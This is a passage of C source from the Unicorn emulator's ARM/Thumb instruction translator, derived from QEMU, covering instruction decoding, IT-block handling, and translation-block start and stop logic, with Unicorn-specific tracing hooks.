arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); return true; } addr = load_reg(s, a->rn); tcg_gen_addi_i32(tcg_ctx, addr, addr, pre_offset[a->pu]); /* Load PC into tmp and CPSR into tmp2. */ t1 = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, t1, addr, get_mem_index(s)); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); t2 = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, t2, addr, get_mem_index(s)); if (a->w) { /* Base writeback. */ tcg_gen_addi_i32(tcg_ctx, addr, addr, post_offset[a->pu]); store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } gen_rfe(s, t1, t2); return true; } static bool trans_SRS(DisasContext *s, arg_SRS *a) { if (!ENABLE_ARCH_6 || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } gen_srs(s, a->mode, a->pu, a->w); return true; } static bool trans_CPS(DisasContext *s, arg_CPS *a) { uint32_t mask, val; if (!ENABLE_ARCH_6 || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { /* Implemented as NOP in user mode. */ return true; } /* TODO: There are quite a lot of UNPREDICTABLE argument combinations. */ mask = val = 0; if (a->imod & 2) { if (a->A) { mask |= CPSR_A; } if (a->I) { mask |= CPSR_I; } if (a->F) { mask |= CPSR_F; } if (a->imod & 1) { val |= mask; } } if (a->M) { mask |= CPSR_M; val |= a->mode; } if (mask) { gen_set_psr_im(s, mask, 0, val); } return true; } static bool trans_CPS_v7m(DisasContext *s, arg_CPS_v7m *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp, addr, el; if (!arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { /* Implemented as NOP in user mode. */ return true; } tmp = tcg_const_i32(tcg_ctx, a->im); /* FAULTMASK */ if (a->F) { addr = tcg_const_i32(tcg_ctx, 19); gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); tcg_temp_free_i32(tcg_ctx, addr); } /* PRIMASK */ if (a->I) { addr = tcg_const_i32(tcg_ctx, 16); gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); tcg_temp_free_i32(tcg_ctx, addr); } el = tcg_const_i32(tcg_ctx, s->current_el); gen_helper_rebuild_hflags_m32(tcg_ctx, tcg_ctx->cpu_env, el); tcg_temp_free_i32(tcg_ctx, el); tcg_temp_free_i32(tcg_ctx, tmp); gen_lookup_tb(s); return true; } /* * Clear-Exclusive, Barriers */ static bool trans_CLREX(DisasContext *s, arg_CLREX *a) { if (s->thumb ? !ENABLE_ARCH_7 && !arm_dc_feature(s, ARM_FEATURE_M) : !ENABLE_ARCH_6K) { return false; } gen_clrex(s); return true; } static bool trans_DSB(DisasContext *s, arg_DSB *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!ENABLE_ARCH_7 && !arm_dc_feature(s, ARM_FEATURE_M)) { return false; } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); return true; } static bool trans_DMB(DisasContext *s, arg_DMB *a) { return trans_DSB(s, NULL); } static bool trans_ISB(DisasContext *s, arg_ISB *a) { if (!ENABLE_ARCH_7 && !arm_dc_feature(s, ARM_FEATURE_M)) { return false; } /* * We need to break the TB after this insn to execute * self-modifying code correctly and also to take * any pending interrupts immediately. */ gen_goto_tb(s, 0, s->base.pc_next); return true; } static bool trans_SB(DisasContext *s, arg_SB *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!dc_isar_feature(aa32_sb, s)) { return false; } /* * TODO: There is no speculation barrier opcode * for TCG; MB and end the TB instead. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); gen_goto_tb(s, 0, s->base.pc_next); return true; } static bool trans_SETEND(DisasContext *s, arg_SETEND *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!ENABLE_ARCH_6) { return false; } if (a->E != (s->be_data == MO_BE)) { gen_helper_setend(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_UPDATE; } return true; } /* * Preload instructions * All are nops, contingent on the appropriate arch level. */ static bool trans_PLD(DisasContext *s, arg_PLD *a) { return ENABLE_ARCH_5TE; } static bool trans_PLDW(DisasContext *s, arg_PLD *a) { return arm_dc_feature(s, ARM_FEATURE_V7MP); } static bool trans_PLI(DisasContext *s, arg_PLD *a) { return ENABLE_ARCH_7; } /* * If-then */ static bool trans_IT(DisasContext *s, arg_IT *a) { int cond_mask = a->cond_mask; /* * No actual code generated for this insn, just setup state. * * Combinations of firstcond and mask which set up an 0b1111 * condition are UNPREDICTABLE; we take the CONSTRAINED * UNPREDICTABLE choice to treat 0b1111 the same as 0b1110, * i.e. both meaning "execute always". */ s->condexec_cond = (cond_mask >> 4) & 0xe; s->condexec_mask = cond_mask & 0x1f; return true; } /* * Legacy decoder. */ static void disas_arm_insn(DisasContext *s, unsigned int insn) { unsigned int cond = insn >> 28; TCGContext *tcg_ctx = s->uc->tcg_ctx; /* M variants do not implement ARM mode; this must raise the INVSTATE * UsageFault exception. */ if (arm_dc_feature(s, ARM_FEATURE_M)) { gen_exception_insn(s, s->pc_curr, EXCP_INVSTATE, syn_uncategorized(), default_exception_el(s)); return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->pc_curr)) { // Sync PC in advance gen_set_pc_im(s, s->pc_curr); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, s->uc, s->pc_curr); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } if (cond == 0xf) { /* In ARMv3 and v4 the NV condition is UNPREDICTABLE; we * choose to UNDEF. In ARMv5 and above the space is used * for miscellaneous unconditional instructions. */ ARCH(5); /* Unconditional instructions. */ /* TODO: Perhaps merge these into one decodetree output file. */ if (disas_a32_uncond(s, insn) || disas_vfp_uncond(s, insn)) { return; } /* fall back to legacy decoder */ if (((insn >> 25) & 7) == 1) { /* NEON Data processing. */ if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { goto illegal_op; } if (disas_neon_data_insn(s, insn)) { goto illegal_op; } return; } if ((insn & 0x0f100000) == 0x04000000) { /* NEON load/store. */ if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { goto illegal_op; } if (disas_neon_ls_insn(s, insn)) { goto illegal_op; } return; } if ((insn & 0x0e000f00) == 0x0c000100) { if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { /* iWMMXt register transfer. */ if (extract32(s->c15_cpar, 1, 1)) { if (!disas_iwmmxt_insn(s, insn)) { return; } } } } else if ((insn & 0x0e000a00) == 0x0c000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { if (disas_neon_insn_3same_ext(s, insn)) { goto illegal_op; } return; } else if ((insn & 0x0f000a00) == 0x0e000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { if (disas_neon_insn_2reg_scalar_ext(s, insn)) { goto illegal_op; } return; } goto illegal_op; } if (cond != 0xe) { /* if not always execute, we generate a conditional jump to next instruction */ arm_skip_unless(s, cond); } /* TODO: Perhaps merge these into one decodetree output file. */ if (disas_a32(s, insn) || disas_vfp(s, insn)) { return; } /* fall back to legacy decoder */ switch ((insn >> 24) & 0xf) { case 0xc: case 0xd: case 0xe: if (((insn >> 8) & 0xe) == 10) { /* VFP, but failed disas_vfp. */ goto illegal_op; } if (disas_coproc_insn(s, insn)) { /* Coprocessor. */ goto illegal_op; } break; default: illegal_op: unallocated_encoding(s); break; } } static bool thumb_insn_is_16bit(DisasContext *s, uint32_t pc, uint32_t insn) { struct uc_struct *uc = s->uc; /* * Return true if this is a 16 bit instruction. We must be precise * about this (matching the decode). */ if ((insn >> 11) < 0x1d) { /* Definitely a 16-bit instruction */ return true; } /* Top five bits 0b11101 / 0b11110 / 0b11111 : this is the * first half of a 32-bit Thumb insn. Thumb-1 cores might * end up actually treating this as two 16-bit insns, though, * if it's half of a bl/blx pair that might span a page boundary. */ if (arm_dc_feature(s, ARM_FEATURE_THUMB2) || arm_dc_feature(s, ARM_FEATURE_M)) { /* Thumb2 cores (including all M profile ones) always treat * 32-bit insns as 32-bit. */ return false; } if ((insn >> 11) == 0x1e && pc - s->page_start < TARGET_PAGE_SIZE - 3) { /* 0b1111_0xxx_xxxx_xxxx : BL/BLX prefix, and the suffix * is not on the next page; we merge this into a 32-bit * insn. */ return false; } /* 0b1110_1xxx_xxxx_xxxx : BLX suffix (or UNDEF); * 0b1111_1xxx_xxxx_xxxx : BL suffix; * 0b1111_0xxx_xxxx_xxxx : BL/BLX prefix on the end of a page * -- handle as single 16 bit insn */ return true; } /* Translate a 32-bit thumb instruction. */ static void disas_thumb2_insn(DisasContext *s, uint32_t insn) { /* * ARMv6-M supports a limited subset of Thumb2 instructions. * Other Thumb1 architectures allow only 32-bit * combined BL/BLX prefix and suffix. */ if (arm_dc_feature(s, ARM_FEATURE_M) && !arm_dc_feature(s, ARM_FEATURE_V7)) { int i; bool found = false; static const uint32_t armv6m_insn[] = {0xf3808000 /* msr */, 0xf3b08040 /* dsb */, 0xf3b08050 /* dmb */, 0xf3b08060 /* isb */, 0xf3e08000 /* mrs */, 0xf000d000 /* bl */}; static const uint32_t armv6m_mask[] = {0xffe0d000, 0xfff0d0f0, 0xfff0d0f0, 0xfff0d0f0, 0xffe0d000, 0xf800d000}; for (i = 0; i < ARRAY_SIZE(armv6m_insn); i++) { if ((insn & armv6m_mask[i]) == armv6m_insn[i]) { found = true; break; } } if (!found) { goto illegal_op; } } else if ((insn & 0xf800e800) != 0xf000e800) { ARCH(6T2); } /* * TODO: Perhaps merge these into one decodetree output file. * Note disas_vfp is written for a32 with cond field in the * top nibble. The t32 encoding requires 0xe in the top nibble. */ if (disas_t32(s, insn) || disas_vfp_uncond(s, insn) || ((insn >> 28) == 0xe && disas_vfp(s, insn))) { return; } /* fall back to legacy decoder */ switch ((insn >> 25) & 0xf) { case 0: case 1: case 2: case 3: /* 16-bit instructions. Should never happen. */ abort(); case 6: case 7: case 14: case 15: /* Coprocessor. */ if (arm_dc_feature(s, ARM_FEATURE_M)) { /* 0b111x_11xx_xxxx_xxxx_xxxx_xxxx_xxxx_xxxx */ if (extract32(insn, 24, 2) == 3) { goto illegal_op; /* op0 = 0b11 : unallocated */ } if (((insn >> 8) & 0xe) == 10 && dc_isar_feature(aa32_fpsp_v2, s)) { /* FP, and the CPU supports it */ goto illegal_op; } else { /* All other insns: NOCP */ gen_exception_insn(s, s->pc_curr, EXCP_NOCP, syn_uncategorized(), default_exception_el(s)); } break; } if ((insn & 0xfe000a00) == 0xfc000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { /* The Thumb2 and ARM encodings are identical. */ if (disas_neon_insn_3same_ext(s, insn)) { goto illegal_op; } } else if ((insn & 0xff000a00) == 0xfe000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { /* The Thumb2 and ARM encodings are identical. */ if (disas_neon_insn_2reg_scalar_ext(s, insn)) { goto illegal_op; } } else if (((insn >> 24) & 3) == 3) { /* Translate into the equivalent ARM encoding. */ insn = (insn & 0xe2ffffff) | ((insn & (1 << 28)) >> 4) | (1 << 28); if (disas_neon_data_insn(s, insn)) { goto illegal_op; } } else if (((insn >> 8) & 0xe) == 10) { /* VFP, but failed disas_vfp. */ goto illegal_op; } else { if (insn & (1 << 28)) goto illegal_op; if (disas_coproc_insn(s, insn)) { goto illegal_op; } } break; case 12: if ((insn & 0x01100000) == 0x01000000) { if (disas_neon_ls_insn(s, insn)) { goto illegal_op; } break; } goto illegal_op; default: illegal_op: unallocated_encoding(s); } } static void disas_thumb_insn(DisasContext *s, uint32_t insn) { if (!disas_t16(s, insn)) { unallocated_encoding(s); } } static bool insn_crosses_page(CPUARMState *env, DisasContext *s) { /* Return true if the insn at dc->base.pc_next might cross a page boundary. * (False positives are OK, false negatives are not.) * We know this is a Thumb insn, and our caller ensures we are * only called if dc->base.pc_next is less than 4 bytes from the page * boundary, so we cross the page if the first 16 bits indicate * that this is a 32 bit insn. */ uint16_t insn = arm_lduw_code(env, s->base.pc_next, s->sctlr_b); return !thumb_insn_is_16bit(s, s->base.pc_next, insn); } static void arm_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = cs->uc; TCGContext *tcg_ctx = cs->uc->tcg_ctx; CPUARMState *env = cs->env_ptr; ARMCPU *cpu = env_archcpu(env); uint32_t tb_flags = dc->base.tb->flags; uint32_t condexec, core_mmu_idx; // unicorn handle dc->uc = uc; dc->isar = &cpu->isar; dc->condjmp = 0; dc->aarch64 = 0; /* If we are coming from secure EL0 in a system with a 32-bit EL3, then * there is no secure EL1, so we route exceptions to EL3. */ dc->secure_routed_to_el3 = arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3); dc->thumb = FIELD_EX32(tb_flags, TBFLAG_AM32, THUMB); dc->be_data = FIELD_EX32(tb_flags, TBFLAG_ANY, BE_DATA) ? MO_BE : MO_LE; condexec = FIELD_EX32(tb_flags, TBFLAG_AM32, CONDEXEC); dc->condexec_mask = (condexec & 0xf) << 1; dc->condexec_cond = condexec >> 4; core_mmu_idx = FIELD_EX32(tb_flags, TBFLAG_ANY, MMUIDX); dc->mmu_idx = core_to_arm_mmu_idx(env, core_mmu_idx); dc->current_el = arm_mmu_idx_to_el(dc->mmu_idx); dc->user = (dc->current_el == 0); dc->fp_excp_el = FIELD_EX32(tb_flags, TBFLAG_ANY, FPEXC_EL); if (arm_feature(env, ARM_FEATURE_M)) { dc->vfp_enabled = 1; dc->be_data = MO_TE; dc->v7m_handler_mode = FIELD_EX32(tb_flags, TBFLAG_M32, HANDLER); dc->v8m_secure = arm_feature(env, ARM_FEATURE_M_SECURITY) && regime_is_secure(env, dc->mmu_idx); dc->v8m_stackcheck = FIELD_EX32(tb_flags, TBFLAG_M32, STACKCHECK); dc->v8m_fpccr_s_wrong = FIELD_EX32(tb_flags, TBFLAG_M32, FPCCR_S_WRONG); dc->v7m_new_fp_ctxt_needed = FIELD_EX32(tb_flags, TBFLAG_M32, NEW_FP_CTXT_NEEDED); dc->v7m_lspact = FIELD_EX32(tb_flags, TBFLAG_M32, LSPACT); } else { dc->be_data = FIELD_EX32(tb_flags, TBFLAG_ANY, BE_DATA) ? MO_BE : MO_LE; dc->debug_target_el = FIELD_EX32(tb_flags, TBFLAG_ANY, DEBUG_TARGET_EL); dc->sctlr_b = FIELD_EX32(tb_flags, TBFLAG_A32, SCTLR_B); dc->hstr_active = FIELD_EX32(tb_flags, TBFLAG_A32, HSTR_ACTIVE); dc->ns = FIELD_EX32(tb_flags, TBFLAG_A32, NS); dc->vfp_enabled = FIELD_EX32(tb_flags, TBFLAG_A32, VFPEN); if (arm_feature(env, ARM_FEATURE_XSCALE)) { dc->c15_cpar = FIELD_EX32(tb_flags, TBFLAG_A32, XSCALE_CPAR); } else { dc->vec_len = FIELD_EX32(tb_flags, TBFLAG_A32, VECLEN); dc->vec_stride = FIELD_EX32(tb_flags, TBFLAG_A32, VECSTRIDE); } } dc->cp_regs = cpu->cp_regs; dc->features = env->features; /* Single step state. The code-generation logic here is: * SS_ACTIVE == 0: * generate code with no special handling for single-stepping (except * that anything that can make us go to SS_ACTIVE == 1 must end the TB; * this happens anyway because those changes are all system register or * PSTATE writes). * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) * emit code for one insn * emit code to clear PSTATE.SS * emit code to generate software step exception for completed step * end TB (as usual for having generated an exception) * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) * emit code to generate a software step exception * end the TB */ dc->ss_active = FIELD_EX32(tb_flags, TBFLAG_ANY, SS_ACTIVE); dc->pstate_ss = FIELD_EX32(tb_flags, TBFLAG_ANY, PSTATE_SS); dc->is_ldex = false; dc->page_start = dc->base.pc_first & TARGET_PAGE_MASK; /* If architectural single step active, limit to 1. */ if (is_singlestepping(dc)) { dc->base.max_insns = 1; } /* ARM is a fixed-length ISA. Bound the number of insns to execute to those left on the page. */ if (!dc->thumb) { #ifdef _MSC_VER int bound = (0 - (dc->base.pc_first | TARGET_PAGE_MASK)) / 4; #else int bound = -(dc->base.pc_first | TARGET_PAGE_MASK) / 4; #endif dc->base.max_insns = MIN(dc->base.max_insns, bound); } tcg_ctx->cpu_V0 = tcg_temp_new_i64(tcg_ctx); tcg_ctx->cpu_V1 = tcg_temp_new_i64(tcg_ctx); /* FIXME: cpu_M0 can probably be the same as cpu_V0. */ tcg_ctx->cpu_M0 = tcg_temp_new_i64(tcg_ctx); } static void arm_tr_tb_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* A note on handling of the condexec (IT) bits: * * We want to avoid the overhead of having to write the updated condexec * bits back to the CPUARMState for every instruction in an IT block. So: * (1) if the condexec bits are not already zero then we write * zero back into the CPUARMState now. This avoids complications trying * to do it at the end of the block. (For example if we don't do this * it's hard to identify whether we can safely skip writing condexec * at the end of the TB, which we definitely want to do for the case * where a TB doesn't do anything with the IT state at all.) * (2) if we are going to leave the TB then we call gen_set_condexec() * which will write the correct value into CPUARMState if zero is wrong. * This is done both for leaving the TB at the end, and for leaving * it because of an exception we know will happen, which is done in * gen_exception_insn(). The latter is necessary because we need to * leave the TB with the PC/IT state just prior to execution of the * instruction which caused the exception. * (3) if we leave the TB unexpectedly (eg a data abort on a load) * then the CPUARMState will be wrong and we need to reset it. * This is handled in the same way as restoration of the * PC in these situations; we save the value of the condexec bits * for each PC via tcg_gen_insn_start(), and restore_state_to_opc() * then uses this to restore them after an exception. * * Note that there are no instructions which can read the condexec * bits, and none which can write non-static values to them, so * we don't need to care about whether CPUARMState is correct in the * middle of a TB. */ /* Reset the conditional execution bits immediately. This avoids complications trying to do it at the end of the block. */ if (dc->condexec_mask || dc->condexec_cond) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); store_cpu_field(tcg_ctx, tmp, condexec_bits); } } static void arm_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, (dc->condexec_cond << 4) | (dc->condexec_mask >> 1), 0); dc->insn_start = tcg_last_op(tcg_ctx); } static bool arm_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (bp->flags & BP_CPU) { gen_set_condexec(dc); gen_set_pc_im(dc, dc->base.pc_next); gen_helper_check_breakpoints(tcg_ctx, tcg_ctx->cpu_env); /* End the TB early; it's likely not going to be executed */ dc->base.is_jmp = DISAS_TOO_MANY; } else { gen_exception_internal_insn(dc, dc->base.pc_next, EXCP_DEBUG); /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order to for it to be properly cleared -- thus we increment the PC here so that the logic setting tb->size below does the right thing. */ /* TODO: Advance PC by correct instruction length to * avoid disassembler error messages */ dc->base.pc_next += 2; dc->base.is_jmp = DISAS_NORETURN; } return true; } static bool arm_pre_translate_insn(DisasContext *dc) { if (dc->ss_active && !dc->pstate_ss) { /* Singlestep state is Active-pending. * If we're in this state at the start of a TB then either * a) we just took an exception to an EL which is being debugged * and this is the first insn in the exception handler * b) debug exceptions were masked and we just unmasked them * without changing EL (eg by clearing PSTATE.D) * In either case we're going to take a swstep exception in the * "did not step an insn" case, and so the syndrome ISV and EX * bits should be zero. */ assert(dc->base.num_insns == 1); gen_swstep_exception(dc, 0, 0); dc->base.is_jmp = DISAS_NORETURN; return true; } return false; } static void arm_post_translate_insn(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->condjmp && !dc->base.is_jmp) { gen_set_label(tcg_ctx, dc->condlabel); dc->condjmp = 0; } translator_loop_temp_check(&dc->base); } static void arm_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUARMState *env = cpu->env_ptr; unsigned int insn; if (arm_pre_translate_insn(dc)) { return; } // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(dc->uc, dcbase->pc_next)) { // imitate WFI instruction to halt emulation dcbase->is_jmp = DISAS_WFI; } else { dc->pc_curr = dc->base.pc_next; insn = arm_ldl_code(env, dc->base.pc_next, dc->sctlr_b); dc->insn = insn; // Unicorn: // // If we get an error during fetching code, we have to skip the instruction decoding // to ensure the PC remains unchanged. // // This is to keep the same behavior with Unicorn1, though, it's inconsistent with // official arm documents. // // See discussion here: https://github.com/unicorn-engine/unicorn/issues/1536 if (dc->uc->invalid_error) { dcbase->is_jmp = DISAS_WFI; return; } dc->base.pc_next += 4; disas_arm_insn(dc, insn); arm_post_translate_insn(dc); /* ARM is a fixed-length ISA. We performed the cross-page check in init_disas_context by adjusting max_insns. */ } } static bool thumb_insn_is_unconditional(DisasContext *s, uint32_t insn) { /* Return true if this Thumb insn is always unconditional, * even inside an IT block. This is true of only a very few * instructions: BKPT, HLT, and SG. * * A larger class of instructions are UNPREDICTABLE if used * inside an IT block; we do not need to detect those here, because * what we do by default (perform the cc check and update the IT * bits state machine) is a permitted CONSTRAINED UNPREDICTABLE * choice for those situations. * * insn is either a 16-bit or a 32-bit instruction; the two are * distinguishable because for the 16-bit case the top 16 bits * are zeroes, and that isn't a valid 32-bit encoding. */ if ((insn & 0xffffff00) == 0xbe00) { /* BKPT */ return true; } if ((insn & 0xffffffc0) == 0xba80 && arm_dc_feature(s, ARM_FEATURE_V8) && !arm_dc_feature(s, ARM_FEATURE_M)) { /* HLT: v8A only. This is unconditional even when it is going to * UNDEF; see the v8A ARM ARM DDI0487B.a H3.3. * For v7 cores this was a plain old undefined encoding and so * honours its cc check. (We might be using the encoding as * a semihosting trap, but we don't change the cc check behaviour * on that account, because a debugger connected to a real v7A * core and emulating semihosting traps by catching the UNDEF * exception would also only see cases where the cc check passed. * No guest code should be trying to do a HLT semihosting trap * in an IT block anyway. */ return true; } if (insn == 0xe97fe97f && arm_dc_feature(s, ARM_FEATURE_V8) && arm_dc_feature(s, ARM_FEATURE_M)) { /* SG: v8M only */ return true; } return false; } static void thumb_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPUARMState *env = cpu->env_ptr; uint32_t insn; bool is_16bit; uint32_t insn_size; if (arm_pre_translate_insn(dc)) { return; } // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, dcbase->pc_next)) { // imitate WFI instruction to halt emulation dcbase->is_jmp = DISAS_WFI; return; } dc->pc_curr = dc->base.pc_next; insn = arm_lduw_code(env, dc->base.pc_next, dc->sctlr_b); is_16bit = thumb_insn_is_16bit(dc, dc->base.pc_next, insn); dc->base.pc_next += 2; if (!is_16bit) { uint32_t insn2 = arm_lduw_code(env, dc->base.pc_next, dc->sctlr_b); insn = insn << 16 | insn2; dc->base.pc_next += 2; } dc->insn = insn; if (dc->condexec_mask && !thumb_insn_is_unconditional(dc, insn)) { uint32_t cond = dc->condexec_cond; /* * Conditionally skip the insn. Note that both 0xe and 0xf mean * "always"; 0xf is not "never". */ if (cond < 0x0e) { arm_skip_unless(dc, cond); } } // Unicorn: // We can't stop in the middle of the IT block. // In other words, treat the whole IT block as // a single instruction. uc->no_exit_request = (dc->condexec_mask != 0); // Unicorn: trace this instruction on request insn_size = is_16bit ? 2 : 4; if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, dc->base.pc_next - insn_size)) { // Sync PC in advance gen_set_pc_im(dc, dc->base.pc_next - insn_size); if (uc->no_exit_request) { gen_uc_tracecode(tcg_ctx, insn_size, UC_HOOK_CODE_IDX | UC_HOOK_FLAG_NO_STOP, uc, dc->base.pc_next - insn_size); } else { gen_uc_tracecode(tcg_ctx, insn_size, UC_HOOK_CODE_IDX, uc, dc->base.pc_next - insn_size); } // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } if (is_16bit) { disas_thumb_insn(dc, insn); } else { disas_thumb2_insn(dc, insn); } /* Advance the Thumb condexec condition. */ if (dc->condexec_mask) { dc->condexec_cond = ((dc->condexec_cond & 0xe) | ((dc->condexec_mask >> 4) & 1)); dc->condexec_mask = (dc->condexec_mask << 1) & 0x1f; if (dc->condexec_mask == 0) { dc->condexec_cond = 0; } } arm_post_translate_insn(dc); /* Thumb is a variable-length ISA. Stop translation when the next insn * will touch a new page. This ensures that prefetch aborts occur at * the right place. * * We want to stop the TB if the next insn starts in a new page, * or if it spans between this page and the next. This means that * if we're looking at the last halfword in the page we need to * see if it's a 16-bit Thumb insn (which will fit in this TB) * or a 32-bit Thumb insn (which won't). * This is to avoid generating a silly TB with a single 16-bit insn * in it at the end of this page (which would execute correctly * but isn't very efficient). */ if (dc->base.is_jmp == DISAS_NEXT && (dc->base.pc_next - dc->page_start >= TARGET_PAGE_SIZE || (dc->base.pc_next - dc->page_start >= TARGET_PAGE_SIZE - 3 && insn_crosses_page(env, dc)))) { dc->base.is_jmp = DISAS_TOO_MANY; } } static void arm_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; if (tb_cflags(dc->base.tb) & CF_LAST_IO && dc->condjmp) { /* FIXME: This can theoretically happen with self-modifying code. */ cpu_abort(cpu, "IO on conditional branch instruction"); } /* At this stage dc->condjmp will only be set when the skipped instruction was a conditional branch or trap, and the PC has already been written. */ gen_set_condexec(dc); if (dc->base.is_jmp == DISAS_BX_EXCRET) { /* Exception return branches need some special case code at the * end of the TB, which is complex enough that it has to * handle the single-step vs not and the condition-failed * insn codepath itself. */ gen_bx_excret_final_code(dc); } else if (unlikely(is_singlestepping(dc))) { /* Unconditional and "condition passed" instruction codepath. */ switch (dc->base.is_jmp) { case DISAS_SWI: gen_ss_advance(dc); gen_exception(tcg_ctx, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb), default_exception_el(dc)); break; case DISAS_HVC: gen_ss_advance(dc); gen_exception(tcg_ctx, EXCP_HVC, syn_aa32_hvc(dc->svc_imm), 2); break; case DISAS_SMC: gen_ss_advance(dc); gen_exception(tcg_ctx, EXCP_SMC, syn_aa32_smc(), 3); break; case DISAS_NEXT: case DISAS_TOO_MANY: case DISAS_UPDATE: gen_set_pc_im(dc, dc->base.pc_next); /* fall through */ default: /* FIXME: Single stepping a WFI insn will not halt the CPU. */ gen_singlestep_exception(dc); break; case DISAS_NORETURN: break; } } else { /* While branches must always occur at the end of an IT block, there are a few other things that can cause us to terminate the TB in the middle of an IT block: - Exception generating instructions (bkpt, swi, undefined). - Page boundaries. - Hardware watchpoints. Hardware breakpoints have already been handled and skip this code. */ switch(dc->base.is_jmp) { case DISAS_NEXT: case DISAS_TOO_MANY: gen_goto_tb(dc, 1, dc->base.pc_next); break; case DISAS_JUMP: gen_goto_ptr(tcg_ctx); break; case DISAS_UPDATE: gen_set_pc_im(dc, dc->base.pc_next); /* fall through */ default: /* indicate that the hash table must be used to find the next TB */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case DISAS_NORETURN: /* nothing more to generate */ break; case DISAS_WFI: { gen_set_pc_im(dc, dc->base.pc_next); TCGv_i32 tmp = tcg_const_i32(tcg_ctx, (dc->thumb && !(dc->insn & (1U << 31))) ? 2 : 4); gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); /* The helper doesn't necessarily throw an exception, but we * must go back to the main loop to check for interrupts anyway. */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; } case DISAS_WFE: gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_YIELD: gen_helper_yield(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_SWI: gen_exception(tcg_ctx, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb), default_exception_el(dc)); break; case DISAS_HVC: gen_exception(tcg_ctx, EXCP_HVC, syn_aa32_hvc(dc->svc_imm), 2); break; case DISAS_SMC: gen_exception(tcg_ctx, EXCP_SMC, syn_aa32_smc(), 3); break; } } if (dc->condjmp) { /* "Condition failed" instruction codepath for the branch/trap insn */ gen_set_label(tcg_ctx, dc->condlabel); gen_set_condexec(dc); if (unlikely(is_singlestepping(dc))) { gen_set_pc_im(dc, dc->base.pc_next); gen_singlestep_exception(dc); } else { gen_goto_tb(dc, 1, dc->base.pc_next); } } } static const TranslatorOps arm_translator_ops = { .init_disas_context = arm_tr_init_disas_context, .tb_start = arm_tr_tb_start, .insn_start = arm_tr_insn_start, .breakpoint_check = arm_tr_breakpoint_check, .translate_insn = arm_tr_translate_insn, .tb_stop = arm_tr_tb_stop, }; static const TranslatorOps thumb_translator_ops = { .init_disas_context = arm_tr_init_disas_context, .tb_start = arm_tr_tb_start, .insn_start = arm_tr_insn_start, .breakpoint_check = arm_tr_breakpoint_check, .translate_insn = thumb_tr_translate_insn, .tb_stop = arm_tr_tb_stop, }; /* generate intermediate code for basic block 'tb'. */ void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns) { DisasContext dc = { 0 }; const TranslatorOps *ops = &arm_translator_ops; if (FIELD_EX32(tb->flags, 